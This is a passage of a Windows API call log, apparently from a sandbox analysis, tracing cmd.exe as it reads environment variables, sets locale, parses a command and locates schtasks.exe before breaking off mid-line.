lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0108.924] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf6f840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0108.924] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf6f840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0108.925] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0108.925] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0108.925] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0108.925] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0108.925] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0108.925] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0108.925] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0108.925] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0108.925] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0108.925] GetProcessHeap () returned 0x3580000 [0108.925] RtlFreeHeap (HeapHandle=0x3580000, Flags=0x0, BaseAddress=0x3585750) returned 1 [0108.925] GetEnvironmentStringsW () returned 0x3584c78* [0108.925] GetProcessHeap () returned 0x3580000 [0108.926] RtlAllocateHeap (HeapHandle=0x3580000, Flags=0x8, Size=0xae2) returned 0x35877f0 [0108.926] FreeEnvironmentStringsA (penv="A") returned 1 [0108.926] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf6f840, nSize=0x2000 | out: lpBuffer="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1b [0108.926] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf6f840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0108.926] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0108.926] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0108.926] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0108.926] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0108.926] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0108.926] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0108.926] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0108.926] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0108.926] malloc (_Size=0xffce) returned 0x379fff8 [0108.927] ??_V@YAXPAX@Z () returned 0x335f494 [0108.927] GetProcessHeap () returned 0x3580000 [0108.927] RtlAllocateHeap (HeapHandle=0x3580000, Flags=0x8, Size=0x38) returned 0x3580ae0 [0108.927] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x379fff8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0108.928] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x7fe7, lpBuffer=0x379fff8, lpFilePart=0x335f4e0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x335f4e0*="Desktop") returned 0x17 [0108.928] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0108.929] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x335f260 | out: lpFindFileData=0x335f260*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x3580b20 [0108.929] FindClose (in: hFindFile=0x3580b20 | out: hFindFile=0x3580b20) returned 1 [0108.929] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0x335f260 | out: lpFindFileData=0x335f260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x3580b20 [0108.930] FindClose (in: hFindFile=0x3580b20 | out: hFindFile=0x3580b20) returned 1 [0108.930] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0x335f260 | out: lpFindFileData=0x335f260*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x2f63dc30, ftLastAccessTime.dwHighDateTime=0x1d6ad29, ftLastWriteTime.dwLowDateTime=0x2f63dc30, ftLastWriteTime.dwHighDateTime=0x1d6ad29, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x3580b20 [0108.930] FindClose (in: hFindFile=0x3580b20 | out: hFindFile=0x3580b20) returned 1 [0108.930] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0108.930] SetCurrentDirectoryW (lpPathName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 1 [0108.931] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\FD1HVy\\Desktop") returned 1 [0108.931] GetProcessHeap () returned 0x3580000 [0108.931] RtlFreeHeap (HeapHandle=0x3580000, Flags=0x0, BaseAddress=0x35877f0) returned 1 [0108.931] GetEnvironmentStringsW () returned 0x3584c78* [0108.931] GetProcessHeap () returned 0x3580000 [0108.931] RtlAllocateHeap (HeapHandle=0x3580000, Flags=0x8, Size=0xb1a) returned 0x3586d00 [0108.931] FreeEnvironmentStringsA (penv="=") returned 1 [0108.931] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x3780048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0108.931] GetProcessHeap () returned 0x3580000 [0108.931] RtlFreeHeap (HeapHandle=0x3580000, Flags=0x0, BaseAddress=0x3580ae0) returned 1 [0108.931] ??_V@YAXPAX@Z () returned 0x1 [0108.931] ??_V@YAXPAX@Z () returned 0x1 [0108.931] GetProcessHeap () returned 0x3580000 [0108.931] RtlAllocateHeap (HeapHandle=0x3580000, Flags=0x8, Size=0x400e) returned 0x3588e08 [0108.932] GetProcessHeap () returned 0x3580000 [0108.932] RtlAllocateHeap (HeapHandle=0x3580000, Flags=0x8, Size=0xcc) returned 0x3587828 [0108.932] GetProcessHeap () returned 0x3580000 [0108.932] RtlFreeHeap (HeapHandle=0x3580000, Flags=0x0, BaseAddress=0x3588e08) returned 1 [0108.932] GetConsoleOutputCP () returned 0x1b5 [0109.427] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf73850 | out: lpCPInfo=0xf73850) returned 1 [0109.427] GetUserDefaultLCID () returned 0x409 [0109.428] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf6f82c, cchData=8 | out: lpLCData=":") returned 2 [0109.428] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x335f850, cchData=128 | out: lpLCData="0") returned 2 [0109.428] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x335f850, cchData=128 | out: lpLCData="0") returned 2 [0109.429] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x335f850, cchData=128 | out: lpLCData="1") returned 2 [0109.429] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf6f81c, cchData=8 | out: lpLCData="/") returned 2 [0109.429] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf6f7b8, cchData=32 | out: lpLCData="Mon") returned 4 [0109.429] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf6f778, cchData=32 | out: lpLCData="Tue") returned 4 [0109.429] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf6f738, cchData=32 | out: lpLCData="Wed") returned 4 [0109.429] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf6f6f8, cchData=32 | out: lpLCData="Thu") returned 4 [0109.429] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf6f6b8, cchData=32 | out: lpLCData="Fri") returned 4 [0109.429] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf6f678, cchData=32 | out: lpLCData="Sat") returned 4 [0109.429] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf6f638, cchData=32 | out: lpLCData="Sun") returned 4 [0109.429] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf6f80c, cchData=8 | out: lpLCData=".") returned 2 [0109.429] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf6f7f8, cchData=8 | out: lpLCData=",") returned 2 [0109.429] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0109.433] GetProcessHeap () returned 0x3580000 [0109.433] RtlAllocateHeap (HeapHandle=0x3580000, Flags=0x0, Size=0x20c) returned 0x3587948 [0109.433] GetConsoleTitleW (in: lpConsoleTitle=0x3587948, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0109.574] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x772d0000 [0109.574] GetProcAddress (hModule=0x772d0000, lpProcName="CopyFileExW") returned 0x772e4330 [0109.574] GetProcAddress (hModule=0x772d0000, lpProcName="IsDebuggerPresent") returned 0x772e5930 [0109.574] GetProcAddress (hModule=0x772d0000, lpProcName="SetConsoleInputExeNameW") returned 0x74d009d0 [0109.574] ??_V@YAXPAX@Z () returned 0x1 [0109.575] GetProcessHeap () returned 0x3580000 [0109.575] RtlAllocateHeap (HeapHandle=0x3580000, Flags=0x8, Size=0x400a) returned 0x3588e08 [0109.575] GetProcessHeap () returned 0x3580000 [0109.575] RtlFreeHeap (HeapHandle=0x3580000, Flags=0x0, BaseAddress=0x3588e08) returned 1 [0109.576] _wcsicmp (_String1="schtasks", _String2=")") returned 74 [0109.576] _wcsicmp (_String1="FOR", _String2="schtasks") returned -13 [0109.576] _wcsicmp (_String1="FOR/?", _String2="schtasks") returned -13 [0109.576] _wcsicmp (_String1="IF", _String2="schtasks") returned -10 [0109.576] _wcsicmp (_String1="IF/?", _String2="schtasks") returned -10 [0109.577] _wcsicmp (_String1="REM", _String2="schtasks") returned -1 [0109.577] _wcsicmp (_String1="REM/?", _String2="schtasks") returned -1 [0109.577] GetProcessHeap () returned 0x3580000 [0109.577] RtlAllocateHeap (HeapHandle=0x3580000, Flags=0x8, Size=0x58) returned 0x3587b60 [0109.577] GetProcessHeap () returned 0x3580000 [0109.577] RtlAllocateHeap (HeapHandle=0x3580000, Flags=0x8, Size=0x1a) returned 0x3587bc0 [0109.579] GetProcessHeap () returned 0x3580000 [0109.579] RtlAllocateHeap (HeapHandle=0x3580000, Flags=0x8, Size=0xb8) returned 0x3587be8 [0109.580] GetConsoleTitleW (in: lpConsoleTitle=0x335f748, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0110.067] malloc (_Size=0xffce) returned 0x3792670 [0110.068] ??_V@YAXPAX@Z () returned 0x335f4d4 [0110.068] malloc (_Size=0xffce) returned 0x37a2648 [0110.069] ??_V@YAXPAX@Z () returned 0x335f28c [0110.070] _wcsicmp (_String1="schtasks", _String2="DIR") returned 15 [0110.070] _wcsicmp (_String1="schtasks", _String2="ERASE") returned 14 [0110.070] _wcsicmp (_String1="schtasks", _String2="DEL") returned 15 [0110.070] _wcsicmp (_String1="schtasks", _String2="TYPE") returned -1 [0110.070] _wcsicmp (_String1="schtasks", _String2="COPY") returned 16 [0110.070] _wcsicmp (_String1="schtasks", _String2="CD") returned 16 [0110.070] _wcsicmp (_String1="schtasks", _String2="CHDIR") returned 16 [0110.070] _wcsicmp (_String1="schtasks", _String2="RENAME") returned 1 [0110.071] _wcsicmp (_String1="schtasks", _String2="REN") returned 1 [0110.071] _wcsicmp (_String1="schtasks", _String2="ECHO") returned 14 [0110.071] _wcsicmp (_String1="schtasks", _String2="SET") returned -2 [0110.071] _wcsicmp (_String1="schtasks", _String2="PAUSE") returned 3 [0110.071] _wcsicmp (_String1="schtasks", _String2="DATE") returned 15 [0110.071] _wcsicmp (_String1="schtasks", _String2="TIME") returned -1 [0110.071] _wcsicmp (_String1="schtasks", _String2="PROMPT") returned 3 [0110.071] _wcsicmp (_String1="schtasks", _String2="MD") returned 6 [0110.071] _wcsicmp (_String1="schtasks", _String2="MKDIR") returned 6 [0110.071] _wcsicmp (_String1="schtasks", _String2="RD") returned 1 [0110.071] _wcsicmp (_String1="schtasks", _String2="RMDIR") returned 1 [0110.071] _wcsicmp (_String1="schtasks", _String2="PATH") returned 3 [0110.071] _wcsicmp (_String1="schtasks", _String2="GOTO") returned 12 [0110.071] _wcsicmp (_String1="schtasks", _String2="SHIFT") returned -5 [0110.071] _wcsicmp (_String1="schtasks", _String2="CLS") returned 16 [0110.071] _wcsicmp (_String1="schtasks", _String2="CALL") returned 16 [0110.071] _wcsicmp (_String1="schtasks", _String2="VERIFY") returned -3 [0110.071] _wcsicmp (_String1="schtasks", _String2="VER") returned -3 [0110.071] _wcsicmp (_String1="schtasks", _String2="VOL") returned -3 [0110.071] _wcsicmp (_String1="schtasks", _String2="EXIT") returned 14 [0110.071] _wcsicmp (_String1="schtasks", _String2="SETLOCAL") returned -2 [0110.071] _wcsicmp (_String1="schtasks", _String2="ENDLOCAL") returned 14 [0110.071] _wcsicmp (_String1="schtasks", _String2="TITLE") returned -1 [0110.071] _wcsicmp (_String1="schtasks", _String2="START") returned -17 [0110.071] _wcsicmp (_String1="schtasks", _String2="DPATH") returned 15 [0110.071] _wcsicmp (_String1="schtasks", _String2="KEYS") returned 8 [0110.072] _wcsicmp (_String1="schtasks", _String2="MOVE") returned 6 [0110.072] _wcsicmp (_String1="schtasks", _String2="PUSHD") returned 3 [0110.072] _wcsicmp (_String1="schtasks", _String2="POPD") returned 3 [0110.072] _wcsicmp (_String1="schtasks", _String2="ASSOC") returned 18 [0110.072] _wcsicmp (_String1="schtasks", _String2="FTYPE") returned 13 [0110.072] _wcsicmp (_String1="schtasks", _String2="BREAK") returned 17 [0110.072] _wcsicmp (_String1="schtasks", _String2="COLOR") returned 16 [0110.072] _wcsicmp (_String1="schtasks", _String2="MKLINK") returned 6 [0110.072] _wcsicmp (_String1="schtasks", _String2="DIR") returned 15 [0110.072] _wcsicmp (_String1="schtasks", _String2="ERASE") returned 14 [0110.072] _wcsicmp (_String1="schtasks", _String2="DEL") returned 15 [0110.072] _wcsicmp (_String1="schtasks", _String2="TYPE") returned -1 [0110.072] _wcsicmp (_String1="schtasks", _String2="COPY") returned 16 [0110.072] _wcsicmp (_String1="schtasks", _String2="CD") returned 16 [0110.072] _wcsicmp (_String1="schtasks", _String2="CHDIR") returned 16 [0110.072] _wcsicmp (_String1="schtasks", _String2="RENAME") returned 1 [0110.072] _wcsicmp (_String1="schtasks", _String2="REN") returned 1 [0110.072] _wcsicmp (_String1="schtasks", _String2="ECHO") returned 14 [0110.072] _wcsicmp (_String1="schtasks", _String2="SET") returned -2 [0110.072] _wcsicmp (_String1="schtasks", _String2="PAUSE") returned 3 [0110.072] _wcsicmp (_String1="schtasks", _String2="DATE") returned 15 [0110.072] _wcsicmp (_String1="schtasks", _String2="TIME") returned -1 [0110.072] _wcsicmp (_String1="schtasks", _String2="PROMPT") returned 3 [0110.072] _wcsicmp (_String1="schtasks", _String2="MD") returned 6 [0110.072] _wcsicmp (_String1="schtasks", _String2="MKDIR") returned 6 [0110.072] _wcsicmp (_String1="schtasks", _String2="RD") returned 1 [0110.072] _wcsicmp (_String1="schtasks", _String2="RMDIR") returned 1 [0110.073] _wcsicmp (_String1="schtasks", _String2="PATH") returned 3 [0110.073] _wcsicmp (_String1="schtasks", _String2="GOTO") returned 12 [0110.073] _wcsicmp (_String1="schtasks", _String2="SHIFT") returned -5 [0110.073] _wcsicmp (_String1="schtasks", _String2="CLS") returned 16 [0110.073] _wcsicmp (_String1="schtasks", _String2="CALL") returned 16 [0110.073] _wcsicmp (_String1="schtasks", _String2="VERIFY") returned -3 [0110.073] _wcsicmp (_String1="schtasks", _String2="VER") returned -3 [0110.073] _wcsicmp (_String1="schtasks", _String2="VOL") returned -3 [0110.073] _wcsicmp (_String1="schtasks", _String2="EXIT") returned 14 [0110.073] _wcsicmp (_String1="schtasks", _String2="SETLOCAL") returned -2 [0110.073] _wcsicmp (_String1="schtasks", _String2="ENDLOCAL") returned 14 [0110.073] _wcsicmp (_String1="schtasks", _String2="TITLE") returned -1 [0110.073] _wcsicmp (_String1="schtasks", _String2="START") returned -17 [0110.073] _wcsicmp (_String1="schtasks", _String2="DPATH") returned 15 [0110.073] _wcsicmp (_String1="schtasks", _String2="KEYS") returned 8 [0110.073] _wcsicmp (_String1="schtasks", _String2="MOVE") returned 6 [0110.073] _wcsicmp (_String1="schtasks", _String2="PUSHD") returned 3 [0110.073] _wcsicmp (_String1="schtasks", _String2="POPD") returned 3 [0110.073] _wcsicmp (_String1="schtasks", _String2="ASSOC") returned 18 [0110.073] _wcsicmp (_String1="schtasks", _String2="FTYPE") returned 13 [0110.073] _wcsicmp (_String1="schtasks", _String2="BREAK") returned 17 [0110.073] _wcsicmp (_String1="schtasks", _String2="COLOR") returned 16 [0110.073] _wcsicmp (_String1="schtasks", _String2="MKLINK") returned 6 [0110.073] _wcsicmp (_String1="schtasks", _String2="FOR") returned 13 [0110.073] _wcsicmp (_String1="schtasks", _String2="IF") returned 10 [0110.073] _wcsicmp (_String1="schtasks", _String2="REM") returned 1 [0110.074] ??_V@YAXPAX@Z () returned 0x1 [0110.074] GetProcessHeap () returned 0x3580000 [0110.074] RtlAllocateHeap (HeapHandle=0x3580000, Flags=0x8, Size=0xffd6) returned 0x3588e08 [0110.075] GetProcessHeap () returned 0x3580000 [0110.075] RtlAllocateHeap (HeapHandle=0x3580000, Flags=0x8, Size=0xca) returned 0x3587ca8 [0110.075] _wcsnicmp (_String1="scht", _String2="cmd ", _MaxCount=0x4) returned 16 [0110.076] malloc (_Size=0xffce) returned 0x37a2648 [0110.076] ??_V@YAXPAX@Z () returned 0x335f00c [0110.076] GetProcessHeap () returned 0x3580000 [0110.076] RtlAllocateHeap (HeapHandle=0x3580000, Flags=0x8, Size=0x1ffa4) returned 0x3598de8 [0110.080] SetErrorMode (uMode=0x0) returned 0x0 [0110.080] SetErrorMode (uMode=0x1) returned 0x0 [0110.080] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x3598df0, lpFilePart=0x335f02c | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x335f02c*="Desktop") returned 0x17 [0110.080] SetErrorMode (uMode=0x0) returned 0x1 [0110.080] GetProcessHeap () returned 0x3580000 [0110.080] RtlReAllocateHeap (Heap=0x3580000, Flags=0x0, Ptr=0x3598de8, Size=0x4a) returned 0x3598de8 [0110.080] GetProcessHeap () returned 0x3580000 [0110.080] RtlSizeHeap (HeapHandle=0x3580000, Flags=0x0, MemoryPointer=0x3598de8) returned 0x4a [0110.080] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf6f840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0110.081] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0110.089] GetProcessHeap () returned 0x3580000 [0110.089] RtlAllocateHeap (HeapHandle=0x3580000, Flags=0x8, Size=0x1b4) returned 0x3587d80 [0110.089] GetProcessHeap () returned 0x3580000 [0110.089] RtlAllocateHeap (HeapHandle=0x3580000, Flags=0x8, Size=0x360) returned 0x3587f40 [0110.102] GetProcessHeap () returned 0x3580000 [0110.102] RtlReAllocateHeap (Heap=0x3580000, Flags=0x0, Ptr=0x3587f40, Size=0x1b6) returned 0x3587f40 [0110.102] GetProcessHeap () returned 0x3580000 [0110.102] RtlSizeHeap (HeapHandle=0x3580000, Flags=0x0, MemoryPointer=0x3587f40) returned 0x1b6 [0110.102] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf6f840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0110.103] GetProcessHeap () returned 0x3580000 [0110.103] RtlAllocateHeap (HeapHandle=0x3580000, Flags=0x8, Size=0xe0) returned 0x3588100 [0110.104] GetProcessHeap () returned 0x3580000 [0110.104] RtlReAllocateHeap (Heap=0x3580000, Flags=0x0, Ptr=0x3588100, Size=0x76) returned 0x3588100 [0110.104] GetProcessHeap () returned 0x3580000 [0110.104] RtlSizeHeap (HeapHandle=0x3580000, Flags=0x0, MemoryPointer=0x3588100) returned 0x76 [0110.105] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0110.105] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\schtasks.*", fInfoLevelId=0x1, lpFindFileData=0x335edb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x335edb8) returned 0xffffffff [0110.106] GetLastError () returned 0x2 [0110.106] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0110.106] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\schtasks.*", fInfoLevelId=0x1, lpFindFileData=0x335edb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x335edb8) returned 0xffffffff [0110.181] GetLastError () returned 0x2 [0110.181] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0110.181] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\schtasks.*", fInfoLevelId=0x1, lpFindFileData=0x335edb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x335edb8) returned 0x3588180 [0110.181] GetProcessHeap () returned 0x3580000 [0110.182] RtlAllocateHeap (HeapHandle=0x3580000, Flags=0x0, Size=0x14) returned 0x35881c0 [0110.182] FindClose (in: hFindFile=0x3588180 | out: hFindFile=0x3588180) returned 1 [0110.182] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\schtasks.COM", fInfoLevelId=0x1, lpFindFileData=0x335edb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x335edb8) returned 0xffffffff [0110.182] GetLastError () returned 0x2 [0110.182] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\schtasks.EXE", fInfoLevelId=0x1, lpFindFileData=0x335edb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x335edb8) returned 0x3588180 [0110.182] GetProcessHeap () returned 0x3580000 [0110.182] RtlReAllocateHeap (Heap=0x3580000, Flags=0x0, Ptr=0x35881c0, Size=0x4) returned 0x35881c0 [0110.182] FindClose (in: hFindFile=0x3588180 | out: hFindFile=0x3588180) returned 1 [0110.182] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0110.182] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0110.182] ??_V@YAXPAX@Z () returned 0x1 [0110.182] GetConsoleTitleW (in: lpConsoleTitle=0x335f2bc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0110.508] InitializeProcThreadAttributeList (in: lpAttributeList=0x335f1e8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x335f1d4 | out: lpAttributeList=0x335f1e8, lpSize=0x335f1d4) returned 1 [0110.508] UpdateProcThreadAttribute (in: lpAttributeList=0x335f1e8, dwFlags=0x0, Attribute=0x60001, lpValue=0x335f1d0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x335f1e8, lpPreviousValue=0x0) returned 1 [0110.508] GetStartupInfoW (in: lpStartupInfo=0x335f220 | out: lpStartupInfo=0x335f220*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0110.508] GetProcessHeap () returned 0x3580000 [0110.508] RtlAllocateHeap (HeapHandle=0x3580000, Flags=0x8, Size=0x18) returned 0x3588180 [0110.509] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0110.509] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0110.509] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0110.509] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0110.509] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0110.509] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0110.509] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0110.509] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0110.509] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0110.509] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0110.509] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0110.509] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0110.509] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0110.509] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0110.509] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0110.509] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0110.509] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0110.509] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0110.509] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0110.509] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0110.509] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0110.509] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0110.509] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0110.509] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0110.509] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0110.510] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0110.510] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0110.510] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0110.510] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0110.510] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0110.510] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0110.510] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0110.510] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0110.510] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0110.510] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0110.510] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0110.510] 